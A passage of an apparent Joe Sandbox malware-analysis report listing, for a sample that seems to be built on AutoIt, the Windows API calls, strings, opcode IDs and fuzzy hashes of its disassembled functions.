                                                                      • Instruction Fuzzy Hash: 7E319E36A0CA5682EB50FB16E4563BA7760FB84B84F140231DA9DD3BA6EF3CD485D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: b0d09a4cedae7a916b9777efa017ba5bfae5d181a44e8c5a94c9dfbe65de8c63
                                                                      • Instruction ID: 656735e2953aae42159beb80454b463d48f6e407ebec1fa83b4a0ccab1590684
                                                                      • Opcode Fuzzy Hash: b0d09a4cedae7a916b9777efa017ba5bfae5d181a44e8c5a94c9dfbe65de8c63
                                                                      • Instruction Fuzzy Hash: 5421B12160C342CAEA60BF1294521797761EF58F90B494134EB5ED7796EF3DE440D704
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 837644225-0
                                                                      • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                      • Instruction ID: ce2bbf23783f79a49689316d07393f12398750e8d3b7f5c16213dfbfadba6a40
                                                                      • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                      • Instruction Fuzzy Hash: D921BF72A28A4186EB08FF21E40676CA3A5FB84B91F494139CA0DD3785EF3CE845DB00
                                                                      APIs
                                                                        • Part of subcall function 00007FF643922A54: GetWindowLongPtrW.USER32 ref: 00007FF643922A71
                                                                      • GetClientRect.USER32(?,?,?,?,?,00007FF64396AA36,?,?,?,?,?,?,?,?,?,00007FF6439227AF), ref: 00007FF6439D22C4
                                                                      • GetCursorPos.USER32(?,?,?,?,?,00007FF64396AA36,?,?,?,?,?,?,?,?,?,00007FF6439227AF), ref: 00007FF6439D22CF
                                                                      • ScreenToClient.USER32 ref: 00007FF6439D22DD
                                                                      • DefDlgProcW.USER32(?,?,?,?,?,00007FF64396AA36,?,?,?,?,?,?,?,?,?,00007FF6439227AF), ref: 00007FF6439D231F
                                                                        • Part of subcall function 00007FF6439CE894: LoadCursorW.USER32 ref: 00007FF6439CE945
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1626762757-0
                                                                      • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                      • Instruction ID: 26be47b6b5dce2dfa5108361ebbf0c29e4f06ce3fbf4eaa3a92520280e06574b
                                                                      • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                      • Instruction Fuzzy Hash: BE213036A0C65686EA18FB05E58216DB760FB84F84F540131EB8DE7B5AEF3CE945DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                      • String ID:
                                                                      • API String ID: 3970641297-0
                                                                      • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                      • Instruction ID: 9e65660d64a8d416a3cefc69aa078c9222eab312dcafb77a49077bc879a54c2c
                                                                      • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                      • Instruction Fuzzy Hash: EB216072A0CBC58AE7A4AB15F8457AAB7A0FB89780F440139DA8DD3B55DF3CD494CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp
                                                                      • String ID:
                                                                      • API String ID: 697997973-0
                                                                      • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                      • Instruction ID: a42635d990a76b76b6c210d293c80cbb7a0d55c98707b81feb9d42420b196f54
                                                                      • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                      • Instruction Fuzzy Hash: 54119C27D0CA4681D611FF38A09217F9371EF9A791F644235FBC9E6A56EE2DD4C09700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2979156933-0
                                                                      • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                      • Instruction ID: bf526d7d02a7df9ae144f95b9838b612976b26f684d525bd89df2256cab53180
                                                                      • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                      • Instruction Fuzzy Hash: 2B21F632A0C7818AE710FF16B8821667A91FB94BD4F444135EA9DD3B56DF3CE0459B40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                      • Instruction ID: 40477b8c2aa19d291bfadb7dbf886e22c3212f0ac1348fc99edbaffeea400d1f
                                                                      • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                      • Instruction Fuzzy Hash: B011497270C542C6E720EF24E08636923A0FF88B88F644135CA4DDAA46EF7DD544EB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$abort
                                                                      • String ID:
                                                                      • API String ID: 1447195878-0
                                                                      • Opcode ID: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
                                                                      • Instruction ID: 93632aea0dd72332ac85d9e79b048006d47e48b45c653f12b15f98d1bae5eee2
                                                                      • Opcode Fuzzy Hash: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
                                                                      • Instruction Fuzzy Hash: 1A019A22B0E342C2FA98BB79A55713C11A1AF48792F545538D90EE2BD7FF2CF8806700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                      • Instruction ID: d8ba46f8e2c3320307def876e6e2e16ccbf3959dc0ee048ee355e3ec66c7c492
                                                                      • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                      • Instruction Fuzzy Hash: 5901D220A0CB8686EA567B24904317EB360BF98741F08433AE94FF5662EF2CE4859A00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                      • Instruction ID: dcf03af8b744616bd203f48cb7d723bf512acc2275ffaebb28891607705ffca4
                                                                      • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                      • Instruction Fuzzy Hash: 0101B535A1C79142E750BB1AB80B7297F60BB81B94F180134DE5993BA2DF7DD4418F00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                      • Instruction ID: e366602a0f299ec3691e3b8fd23de60e1e2f1fb994c9e22905f66e95a6697317
                                                                      • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                      • Instruction Fuzzy Hash: F1F06561A5D90283FB947F61EC0776823A0AF59F85F884035C90EE2255FF3C9989A700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                      • Instruction ID: 9c87f6848b4cbe77504fa06188d48775eca60ccfdd29624b2d203e90702615da
                                                                      • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                      • Instruction Fuzzy Hash: DAE0E564A0D30286FA44BF72984E2382254AB48FC2F004030CD0EE3B66EF3CA009AB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                      • Instruction ID: 9ababa17f3e214b12cfbe23f7e5e3a3f6c5c78e7ed5dbc7d2fbf98230eb61756
                                                                      • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                      • Instruction Fuzzy Hash: B6E09264A0D75286EA44BF72A85E2792255AB49FD2F004034CD0EE7B66EF7DA009AB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: gfffffff
                                                                      • API String ID: 3215553584-1523873471
                                                                      • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                      • Instruction ID: 709aea202cdbfa9d524e70ad8a76e29242aa07a765cd91d08f24dafbfffa2b9b
                                                                      • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                      • Instruction Fuzzy Hash: E4915963A0D38A86EB21BF2591413BC6BD5AB25BC0F048131DB8DD7396EE3DE546E701
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ContainedObject
                                                                      • String ID: AutoIt3GUI$Container
                                                                      • API String ID: 3565006973-3941886329
                                                                      • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                      • Instruction ID: 98861223804dca1f445d2f62a5b6a62b6583bea627f0ff2e2e291a146bf2cbac
                                                                      • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                      • Instruction Fuzzy Hash: 9A914636608B46C6DB24EF29E4412AD73A1FB88B88F518036DF9D93726EF39D845D300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: e+000$gfff
                                                                      • API String ID: 3215553584-3030954782
                                                                      • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                      • Instruction ID: 972b1efa9b69a6d6aa8fcdba5b232ce6004edc737006ecb7f1c728cb849a78da
                                                                      • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                      • Instruction Fuzzy Hash: 11511863B1C7C146E765AF35994236A6A91EB81B90F0C9231C699D7BD7EF2CD084D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _snwprintf
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                      • API String ID: 3988819677-2584243854
                                                                      • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                      • Instruction ID: 5d5bf672214a73b1e948bf9ddbd37ee41709682639a6db5627d4a7f946990dd8
                                                                      • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                      • Instruction Fuzzy Hash: F2312976B0CB0295EB14FB61E4921EC2766FB44784B504432DA1DE775BEF38E50AE340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateMessageObjectSendStock
                                                                      • String ID: $SysTabControl32
                                                                      • API String ID: 2080134422-3143400907
                                                                      • Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                      • Instruction ID: f63027524fc06aa157399c420cab53ed11186e5dfa1fe4f327cf159bb227e23e
                                                                      • Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                      • Instruction Fuzzy Hash: 6A3157325087C18AE760EF25A84579AB7A0F784BA4F144339EAA957AD9DB38D491CF00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Combobox
                                                                      • API String ID: 1025951953-2096851135
                                                                      • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
